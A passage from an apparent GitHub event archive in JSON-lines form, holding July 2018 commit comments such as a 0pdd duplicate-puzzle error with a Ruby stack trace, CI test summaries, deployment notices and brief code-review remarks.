puzzler-github/src/test/resources/com/github/skapral/puzzler/github/operation/ownerIsNotSender...\nReading puzzler-github/src/test/resources/com/github/skapral/puzzler/github/operation/signedBody...\nReading puzzler-github/src/test/resources/com/github/skapral/puzzler/github/operation/ownerIsSender...\nReading puzzler-github/src/test/resources/testComments.json...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/text/threepars/TwPuzzlerbotUser.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/text/threepars/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/location/GhapiStatic.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/location/GithubAPI.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/location/GhapiProduction.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/location/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/operation/OpIgnoringUnprivildgedEventSender.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/operation/OpValidatingGithubEventSignature.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/operation/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/puzzle/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/project/GithubProject.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/project/GprjFromGithubEvent.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/project/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/itracker/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/itracker/ItGithubIssues.java...\nPuzzle 20-c1aa8a54 0/DEV at puzzler-github/src/main/java/com/github/skapral/puzzler/github/itracker/ItGithubIssues.java\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/source/PsrcFromGithubComments.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/source/PsrcFromGithubEvent.java...\nPuzzle 27-7995c0a8 0/DEV at puzzler-github/src/main/java/com/github/skapral/puzzler/github/source/PsrcFromGithubEvent.java\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/source/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/config/Cp_GITHUB_HOOK_SECRET.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/config/Cp_GITHUB_AUTH_TOKEN.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/config/package-info.java...\nReading puzzler-github/pom.xml...\nReading appveyor.yml...\nReading checkstyle.xml...\nReading .0pdd.yml...\nERROR: there are 2 duplicate(s) of the same puzzle: puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/source/PsrcFromGitlabEvent.java:67-67, puzzler-github/src/main/java/com/github/skapral/puzzler/github/source/PsrcFromGithubEvent.java:67-67, while maximum 1 duplicate is allowed\nERROR: 1 errors, see log above. If you can't understand the cause of this issue or you don't know how to fix it, please submit a GitHub issue, we will try to help you: https://github.com/yegor256/pdd/issues. This tool is still in its beta version and we will appreciate your feedback. Here is where you can find more documentation: https://github.com/yegor256/pdd/blob/master/README.md.\nExit code is 1\n\n/app/objects/git_repo.rb:66:in `rescue in block in xml'\n/app/objects/git_repo.rb:63:in `block in xml'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/tempfile.rb:295:in `open'\n/app/objects/git_repo.rb:62:in `xml'\n/app/objects/puzzles.rb:36:in `deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-12T22:57:10Z"}
{"id":"7959146314","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-npm-bot"},"payload":{"comment":{"id":29692401,"position":null,"line":null,"path":null,"commit_id":"c2a5e44c016ce998863f17cf8c8b7494e0d7d636","created_at":"2018-07-12T22:57:55Z","updated_at":"2018-07-12T22:57:55Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/231cfaed-dee3-41dd-bc34-7ac455844f41?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-npm-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/d3eb67e5-8c70-4643-914e-e6ea3f66dbcd?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-npm-bot\") deployed [watsonwork-npm-bot](https://github.com/WilliamHolmes/watsonwork-npm-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-225752 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-225752\") to [dev](https://console.bluemix.net/apps/9c2ca816-83ee-4315-b134-56ed25d0471e?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T22:57:55Z"}
{"id":"7959146478","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29692402,"position":40,"line":494,"path":"code/Example/Drasil/SWHS/Body.hs","commit_id":"45016d66ff58479e2ac553bee2024689622d26da","created_at":"2018-07-12T22:57:58Z","updated_at":"2018-07-12T22:57:58Z","author_association":"COLLABORATOR","body":"This whole sentence has been removed."}},"created_at":"2018-07-12T22:57:58Z"}
{"id":"7959146704","type":"CommitCommentEvent","actor":{"login":"Tricky1975"},"repo":{"name":"Wendicka/Scyndi"},"payload":{"comment":{"id":29692403,"position":1,"line":1,"path":"system_module/BlitzMax_tempaway","commit_id":"b174ef4f868ef5222f4b76cee54e48def338b3eb","created_at":"2018-07-12T22:58:03Z","updated_at":"2018-07-12T22:58:03Z","author_association":"CONTRIBUTOR","body":"This file is just temp stuff...\r\nOnce infinite parameters work, this file will be merged with the original file again."}},"created_at":"2018-07-12T22:58:03Z"}
{"id":"7959148419","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29692411,"position":null,"line":null,"path":null,"commit_id":"b2bb8ce687dee1cf835f6d2a2bc3f52c21c4a8a3","created_at":"2018-07-12T22:58:35Z","updated_at":"2018-07-12T22:58:35Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fazer o link entre as telas](https://trello.com/c/J305NGFg/205-fazer-o-link-entre-as-telas)"}},"created_at":"2018-07-12T22:58:35Z"}
{"id":"7959148678","type":"CommitCommentEvent","actor":{"login":"savef"},"repo":{"name":"savef/ranked-model"},"payload":{"comment":{"id":29692412,"position":null,"line":null,"path":null,"commit_id":"7242ba6630567ce75e91bf817b583a6f3d9ffd1a","created_at":"2018-07-12T22:58:39Z","updated_at":"2018-07-12T22:58:39Z","author_association":"OWNER","body":"@brendon I'm afraid not, sorry."}},"created_at":"2018-07-12T22:58:39Z"}
{"id":"7959149256","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29692415,"position":null,"line":null,"path":null,"commit_id":"49d5527dae80bfa323aeb357d7f89f2e8a1d26cb","created_at":"2018-07-12T22:58:50Z","updated_at":"2018-07-12T22:58:50Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fazer o link entre as telas](https://trello.com/c/J305NGFg/205-fazer-o-link-entre-as-telas)"}},"created_at":"2018-07-12T22:58:50Z"}
{"id":"7959150129","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29692416,"position":null,"line":null,"path":null,"commit_id":"79d2c77430a0d777725cd0d596ffb820aa7fabb6","created_at":"2018-07-12T22:59:08Z","updated_at":"2018-07-12T22:59:08Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Checar responsividade das telas](https://trello.com/c/Ng1N616T/204-checar-responsividade-das-telas)"}},"created_at":"2018-07-12T22:59:08Z"}
{"id":"7959151053","type":"CommitCommentEvent","actor":{"login":"mpiercy827"},"repo":{"name":"lob/lob-node"},"payload":{"comment":{"id":29692420,"position":9,"line":9,"path":"CHANGELOG.md","commit_id":"0873b10560ed057d8bfe41b38b839cf172e7d79d","created_at":"2018-07-12T22:59:26Z","updated_at":"2018-07-12T22:59:26Z","author_association":"CONTRIBUTOR","body":"@peterdolan I'm sorry, we are unable to accept contributions on commits that have already been merged to master. We appreciate your interest and feedback, and would encourage you to apply to one of our numerous open positions on [our careers page](https://lob.com/careers).\r\n\r\nIn the meantime, please enjoy this photo of a sad Peter Dolan:\r\n![image](https://user-images.githubusercontent.com/10817843/42663875-8b7973d0-85ec-11e8-9a3c-f142e7196a41.png)\r\n"}},"created_at":"2018-07-12T22:59:26Z"}
{"id":"7959155465","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29692433,"position":null,"line":null,"path":null,"commit_id":"775ca76c1b861ca39e6e79f5e2624b6364477257","created_at":"2018-07-12T23:00:43Z","updated_at":"2018-07-12T23:00:43Z","author_association":"COLLABORATOR","body":"Checked. This paragraph has been restore the old."}},"created_at":"2018-07-12T23:00:43Z"}
{"id":"7959156331","type":"CommitCommentEvent","actor":{"login":"jonfazzaro"},"repo":{"name":"aptera/timeforce"},"payload":{"comment":{"id":29692438,"position":null,"line":null,"path":null,"commit_id":"0b827e902c787f1ee875a151eb2292cf1629a424","created_at":"2018-07-12T23:00:59Z","updated_at":"2018-07-12T23:00:59Z","author_association":"NONE","body":"#18 "}},"created_at":"2018-07-12T23:00:59Z"}
{"id":"7959157403","type":"CommitCommentEvent","actor":{"login":"zigomir"},"repo":{"name":"celtra/stateless-components"},"payload":{"comment":{"id":29692440,"position":null,"line":null,"path":null,"commit_id":"ac7cab37ffdd83fb52c8f8aeb986b60c07b11eb4","created_at":"2018-07-12T23:01:18Z","updated_at":"2018-07-12T23:01:18Z","author_association":"CONTRIBUTOR","body":"@jkosir inclusion of `import { throttle } from 'lodash'` boosts VCE bundle size significantly. From 16kb to 44kb. I know that webpack should probably do its magic but it's not doing it for me atm :) I suggest we go with `lodash.throttle` for now: [lodash](https://bundlephobia.com/result?p=lodash@4.17.10) vs [lodash.throttle](https://bundlephobia.com/result?p=lodash.throttle@4.1.1)\r\n\r\n/cc @kurent"}},"created_at":"2018-07-12T23:01:18Z"}
{"id":"7959158065","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/fermipy-feedstock"},"payload":{"comment":{"id":29692442,"position":null,"line":null,"path":null,"commit_id":"61f797794a7e7de1a6a449a5c3d3ff5ae014a488","created_at":"2018-07-12T23:01:30Z","updated_at":"2018-07-12T23:01:30Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @dimauromattia were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @dimauromattia were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-12T23:01:30Z"}
{"id":"7959158745","type":"CommitCommentEvent","actor":{"login":"carlosmarin"},"repo":{"name":"anomalydetect/anomalydetect"},"payload":{"comment":{"id":29692443,"position":13,"line":83,"path":"app.py","commit_id":"1cdfef0899f23b1961f9d74af6069b5891479721","created_at":"2018-07-12T23:01:43Z","updated_at":"2018-07-12T23:01:43Z","author_association":"COLLABORATOR","body":"I don't think this is a list, can you have both types? (or is data type expected to be a list?)"}},"created_at":"2018-07-12T23:01:43Z"}
{"id":"7959163923","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29692452,"position":66,"line":444,"path":"code/Example/Drasil/NoPCM/Body.hs","commit_id":"908e38e5c4424aa6a46b71e265969c43aef55738","created_at":"2018-07-12T23:03:20Z","updated_at":"2018-07-12T23:03:20Z","author_association":"COLLABORATOR","body":"Checked. The whole new chunks have been removed."}},"created_at":"2018-07-12T23:03:20Z"}
{"id":"7959167142","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29692456,"position":null,"line":null,"path":null,"commit_id":"01791059c35ce1ac0476c20043f89db209f0ea5b","created_at":"2018-07-12T23:04:17Z","updated_at":"2018-07-12T23:04:17Z","author_association":"COLLABORATOR","body":"Puzzle `33-65714492` discovered in   [`src/test/java/io/zold/api/WalletTest.java`](  https://github.com/zold-io/java-api/blob/master/src/test/java/io/zold/api/WalletTest.java)   and submitted as #34. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-12T23:04:17Z"}
{"id":"7959169438","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29692462,"position":null,"line":null,"path":null,"commit_id":"3c7773862d231c5a6007edb76e20720c04de58af","created_at":"2018-07-12T23:05:02Z","updated_at":"2018-07-12T23:05:02Z","author_association":"COLLABORATOR","body":"We have `Note` to remember those information now. These information has been found back."}},"created_at":"2018-07-12T23:05:02Z"}
{"id":"7959171238","type":"CommitCommentEvent","actor":{"login":"garywong-bc"},"repo":{"name":"bcgov/gwells"},"payload":{"comment":{"id":29692466,"position":null,"line":null,"path":null,"commit_id":"331c76cd703220ea9bf237388a1d9902d9d6f4dd","created_at":"2018-07-12T23:05:36Z","updated_at":"2018-07-12T23:05:36Z","author_association":"COLLABORATOR","body":"So is everyone moving their VENV to python36 on their own local dev environments?  @DerekRoberts  @Sybrand  @stephenhillier "}},"created_at":"2018-07-12T23:05:36Z"}
{"id":"7959171509","type":"CommitCommentEvent","actor":{"login":"jfirebaugh"},"repo":{"name":"mapbox/variant"},"payload":{"comment":{"id":29692469,"position":23,"line":40,"path":"include/mapbox/variant.hpp","commit_id":"372d7c88fe796a138d0e578328914ac80e5a949a","created_at":"2018-07-12T23:05:41Z","updated_at":"2018-07-12T23:05:41Z","author_association":"MEMBER","body":"@artemp Was it intended to comment this out (and the `__declspec(noinline)` above)?"}},"created_at":"2018-07-12T23:05:41Z"}
{"id":"7959172210","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29692471,"position":null,"line":null,"path":null,"commit_id":"eb78bd676ccb9b915e2bee6ce82515b2e465750a","created_at":"2018-07-12T23:05:53Z","updated_at":"2018-07-12T23:05:53Z","author_association":"COLLABORATOR","body":"As other issues, those information has been added to notes."}},"created_at":"2018-07-12T23:05:53Z"}
{"id":"7959175142","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29692476,"position":131,"line":1458,"path":"code/stable/ssp/SSP_SRS.html","commit_id":"7416023af3bbb85a4f82b555c717ebdd67d45d61","created_at":"2018-07-12T23:06:46Z","updated_at":"2018-07-12T23:06:46Z","author_association":"COLLABORATOR","body":"They were added back as notes."}},"created_at":"2018-07-12T23:06:46Z"}
{"id":"7959175662","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29692479,"position":169,"line":1496,"path":"code/stable/ssp/SSP_SRS.html","commit_id":"7416023af3bbb85a4f82b555c717ebdd67d45d61","created_at":"2018-07-12T23:06:56Z","updated_at":"2018-07-12T23:06:56Z","author_association":"COLLABORATOR","body":"As above."}},"created_at":"2018-07-12T23:06:56Z"}
{"id":"7959176096","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29692480,"position":219,"line":1534,"path":"code/stable/ssp/SSP_SRS.html","commit_id":"7416023af3bbb85a4f82b555c717ebdd67d45d61","created_at":"2018-07-12T23:07:06Z","updated_at":"2018-07-12T23:07:06Z","author_association":"COLLABORATOR","body":"As above."}},"created_at":"2018-07-12T23:07:06Z"}
{"id":"7959180482","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29692489,"position":null,"line":null,"path":null,"commit_id":"e226a4505935223be35049fd240a9120778b4a5b","created_at":"2018-07-12T23:08:35Z","updated_at":"2018-07-12T23:08:35Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-22](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-22).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-22-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-12T23:08:35Z"}
{"id":"7959180974","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29692494,"position":null,"line":null,"path":null,"commit_id":"7416023af3bbb85a4f82b555c717ebdd67d45d61","created_at":"2018-07-12T23:08:46Z","updated_at":"2018-07-12T23:08:46Z","author_association":"COLLABORATOR","body":"We got them back."}},"created_at":"2018-07-12T23:08:46Z"}
{"id":"7959185235","type":"CommitCommentEvent","actor":{"login":"garywong-bc"},"repo":{"name":"bcgov/gwells"},"payload":{"comment":{"id":29692507,"position":null,"line":null,"path":null,"commit_id":"262354f55c93852087bfa5c792d5cc212df190c6","created_at":"2018-07-12T23:10:17Z","updated_at":"2018-07-12T23:10:17Z","author_association":"COLLABORATOR","body":"D'oh!! I saw that last night and assumed that my npm/python/webpack needed updating.. so I guess it's an issue with the code not my local config.  thanks for fixing it."}},"created_at":"2018-07-12T23:10:17Z"}
{"id":"7959187316","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29692511,"position":null,"line":null,"path":null,"commit_id":"e753d0fde5970e6ee507bf7246520b396044c674","created_at":"2018-07-12T23:11:01Z","updated_at":"2018-07-12T23:11:01Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-react](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-react).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-react-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T23:11:01Z"}
{"id":"7959191108","type":"CommitCommentEvent","actor":{"login":"kumar2019"},"repo":{"name":"kumar2019/MyApplication"},"payload":{"comment":{"id":29692521,"position":null,"line":null,"path":null,"commit_id":"d5fed85b7bc2bcd7681e463a65dd9c9d011c0237","created_at":"2018-07-12T23:12:20Z","updated_at":"2018-07-12T23:12:20Z","author_association":"OWNER","body":"change made"}},"created_at":"2018-07-12T23:12:20Z"}
{"id":"7959195032","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29692526,"position":null,"line":null,"path":null,"commit_id":"4d89755748773cfc357d0cbaf4f8e2cabc2c81fe","created_at":"2018-07-12T23:13:45Z","updated_at":"2018-07-12T23:13:45Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - Win64-Windows-7-VisualStudio-14: OK (2933 of 2934 tests passed, 27 test warnings)\n\nMessages:\n\n * 16 tests had: AUD diffs.\n * 11 tests had: ERR diffs.\n * 4 tests had: RDD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T23:13:45Z"}
{"id":"7959196233","type":"CommitCommentEvent","actor":{"login":"aniketnk"},"repo":{"name":"aniketnk/alcoding-data-analysis"},"payload":{"comment":{"id":29692533,"position":null,"line":null,"path":null,"commit_id":"79d03a7ee29842883d6321da0d170147d61d5a00","created_at":"2018-07-12T23:14:13Z","updated_at":"2018-07-12T23:14:13Z","author_association":"OWNER","body":"Some endpoints got deleted in this commit. Can you change?"}},"created_at":"2018-07-12T23:14:13Z"}
{"id":"7959200134","type":"CommitCommentEvent","actor":{"login":"FrauDeborah"},"repo":{"name":"FrauDeborah/quizki-backend"},"payload":{"comment":{"id":29692549,"position":null,"line":null,"path":null,"commit_id":"b5af53bd0b62ef3e792708dced7039879e5008bf","created_at":"2018-07-12T23:15:38Z","updated_at":"2018-07-12T23:15:38Z","author_association":"OWNER","body":"Closing and trying again. the .gitignore file was missing."}},"created_at":"2018-07-12T23:15:38Z"}
{"id":"7959202026","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29692554,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-12T23:16:17Z","updated_at":"2018-07-12T23:16:17Z","author_association":"NONE","body":"kiva-non-quad-walls (mjwitte) - x86_64-MacOS-10.9-clang: OK (2934 of 2934 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T23:16:17Z"}
{"id":"7959204494","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Redux-Friends"},"payload":{"comment":{"id":29692562,"position":null,"line":null,"path":null,"commit_id":"11fd178f079a5b8e7e4aba5beda1425ceec38dda","created_at":"2018-07-12T23:17:13Z","updated_at":"2018-07-12T23:17:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create function for adding new friend](https://trello.com/c/edVamdeq/2-create-function-for-adding-new-friend)"}},"created_at":"2018-07-12T23:17:13Z"}
{"id":"7959208513","type":"CommitCommentEvent","actor":{"login":"jmcphers"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":29692576,"position":null,"line":null,"path":null,"commit_id":"3e6bd3d5795d3baf6dee73058ac6a1deb5b8e061","created_at":"2018-07-12T23:18:41Z","updated_at":"2018-07-12T23:18:41Z","author_association":"MEMBER","body":"Mea culpa, thanks for fixing this!"}},"created_at":"2018-07-12T23:18:41Z"}
{"id":"7959214649","type":"CommitCommentEvent","actor":{"login":"aNeutrino"},"repo":{"name":"RocketChat/Rocket.Chat.Android"},"payload":{"comment":{"id":29692588,"position":9,"line":10,"path":"app/src/main/res/drawable/round_textview.xml","commit_id":"3f2148d1293e8a27cbb7b1a324eeddc2a554e87e","created_at":"2018-07-12T23:20:53Z","updated_at":"2018-07-12T23:20:53Z","author_association":"NONE","body":"@filipedelimabrito Please set up in your IDE or EDITOR \"newline at end of file\""}},"created_at":"2018-07-12T23:20:53Z"}
